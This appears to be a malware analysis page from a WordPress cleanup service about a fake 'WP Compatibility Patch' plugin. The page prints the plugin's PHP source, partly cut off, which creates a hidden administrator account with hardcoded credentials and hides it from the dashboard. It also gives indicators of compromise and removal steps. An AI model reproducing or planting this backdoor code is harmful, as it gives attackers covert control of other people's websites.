Critical Backdoor 🛡️ Zero-Day Variant

WP Compatibility Patch Backdoor

Case ID: wp-compat-hidden-plugin • Detected: 2026-01-14

Impact Radius
wp-content/plugins/wp-compatibility-patch
Removal Difficulty
Moderate
Recurrence Rate
High
Key Symptom
Creates unauthorized admin access and hides the backdoor, compromising site security.

Technical Analysis

The malware masquerades as a WordPress plugin named ‘WP Compatibility Patch’. It is designed to create a hidden administrator user with credentials ‘adminbackup’ and the password ‘0m58scqdh3’. This backdoor is inserted into the site by modifying WordPress actions and filters to conceal the user from the admin panel and exclude the plugin from the activated plugins list. Evidence shows this method has been used on over 250 sites, indicating it’s a recurrent exploit tactic.

VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.

Attack Chain

  1. The fake plugin ‘WP Compatibility Patch’ is placed in the plugins directory.
  2. An administrator user is created using the ‘wp_insert_user’ function, cloaked by modifications to WordPress user queries and views.
  3. Changes to the site backend prevent the admin user and plugin from appearing in the dashboard.

Code Signature(s)

FILE: malware-sample.php

<?php
/*
Plugin Name: WP Compatibility Patch
Description: Fixes minor compatibility issues with the latest WordPress and PHP versions.
Version: 1.3.2
Author: WP Core Contributors
*/

if (
    !function_exists('wpc_patch_bootstrap') &&
    function_exists('add_action') &&
    function_exists('wp_insert_user')
) {
    $params = array(
        'user_login' => 'adminbackup',
        'user_pass'  => '0m58scqdh3',
        'role'       => 'administrator',
        'user_email' => 'adminbackup@wordpress.org'
    );

    add_action('init', 'wpc_patch_bootstrap', 0);
    function wpc_patch_bootstrap() {
        global $params;
        $stored_id = get_option('_pre_user_id');
        $existing_user = get_user_by('login', $params['user_login']);

        if (!$existing_user) {
            $id = wp_insert_user($params);
            update_option('_pre_user_id', $id);
        } else {
            if ($existing_user->user_email !== $params['user_email']) {
                $uid = $stored_id ? $stored_id : $existing_user->ID;
                wp_set_password($params['user_pass'], $uid);
                wp_update_user([
                    'ID' => $uid,
                    'user_email' => $params['user_email']
                ]);
            }
            if (!$stored_id) {
                update_option('_pre_user_id', $existing_user->ID);
            }
        }
    }

    add_action('pre_user_query', function($query) {
        if (!is_admin()) return;
        $current_user_id = get_current_user_id();
        $hidden_id = get_option('_pre_user_id');

        if ($current_user_id != $hidden_id && $hidden_id) {
            global $wpdb;
            $query->query_where .= " AND {$wpdb->users}.ID != " . intval($hidden_id);
        }
    });

    add_filter('views_users', function($views) {
        $id = get_option('_pre_user_id');
        if (!$id) return $views;

        foreach ($views as $role => $html) {
            $views[$r

Indicators of Compromise (IOCs)

  • WP Compatibility Patch
  • adminbackup
  • 0m58scqdh3
  • adminbackup@wordpress.org
  • _pre_user_id

Removal Protocol

  1. Delete the ‘WP Compatibility Patch’ plugin folder from wp-content/plugins.
  2. Remove the created administrator user ‘adminbackup’ directly from phpMyAdmin.
  3. Check for and delete any suspicious or unknown posts created by the fake user.
  4. Remove the option ‘_pre_user_id’ from the options table in the database.

Status: Active Threat.
Verification: Verified by MD Pabel.

Need help removing this?

This malware is rated as Moderate difficulty. If you are unsure, do not attempt manual removal.

Hire MD Pabel for Cleanup